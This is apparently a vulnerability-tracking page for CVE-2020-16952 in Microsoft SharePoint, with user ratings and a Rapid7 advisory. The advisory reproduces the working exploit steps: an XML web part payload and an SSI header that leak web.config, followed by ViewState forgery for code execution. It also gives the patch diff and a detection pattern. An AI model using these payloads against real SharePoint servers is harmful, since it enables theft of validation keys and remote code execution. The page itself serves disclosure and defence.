Attacker Value
Very High
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
6

CVE-2020-16952 — Microsoft SharePoint Remote Code Execution Vulnerabilities

Disclosure Date: October 16, 2020
Exploited in the Wild
Reported by captainGeech42
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951.

Add Assessment

3
Ratings
Technical Analysis

Please see the Rapid7 analysis. A Metasploit module will be released.

2
Ratings
Technical Analysis

There were a lot of vulns out this week, a number of which got quite a bit more news cycle attention than this one (lookin’ at you, Bad Neighbor). Unlike a few of those higher-hype bugs, however, this one is an active threat. Like other significant vulnerabilities from this year, the fact that this is authenticated isn’t a barrier for attackers and alas, shouldn’t be a consolation for those tasked with securing SharePoint environments.

@tsellers-r7 has a really great Twitter thread here on the number of publicly exposed, vulnerable SharePoint installations and version/support complexities that defenders may not realize they need to take into account. Metasploit Framework will also have module out in next week’s release.

General Information

Vendors

  • Microsoft

Products

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Server 2019
  • Microsoft SharePoint Foundation 2013 Service Pack 1

Additional Info

Technical Analysis

Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.

Description

On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.

Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.

An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.

Affected products

  • Microsoft SharePoint Foundation 2013 Service Pack 1
  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Server 2019

Rapid7 analysis

CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.

Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).

<WebPartPages:DataFormWebPart runat="server">
<ParameterBindings>
 <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
</ParameterBindings>
 <xsl>
   <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
     <xsl:param name="ssi" />
     <xsl:template match="/">
       <xsl:value-of select="$ssi" disable-output-escaping="yes" />
     </xsl:template>
   </xsl:stylesheet>
 </xsl>
</WebPartPages:DataFormWebPart>


Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.

360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->


Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.

The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():

- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false);
+ EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);
internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)

SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability’s exploitability and weaponize Seeley’s PoC.

Guidance

Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.

For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.

Defenders can detect this exploit variant by identifying HTTP headers containing the string runat="server", as well as auditing SharePoint page creations.

References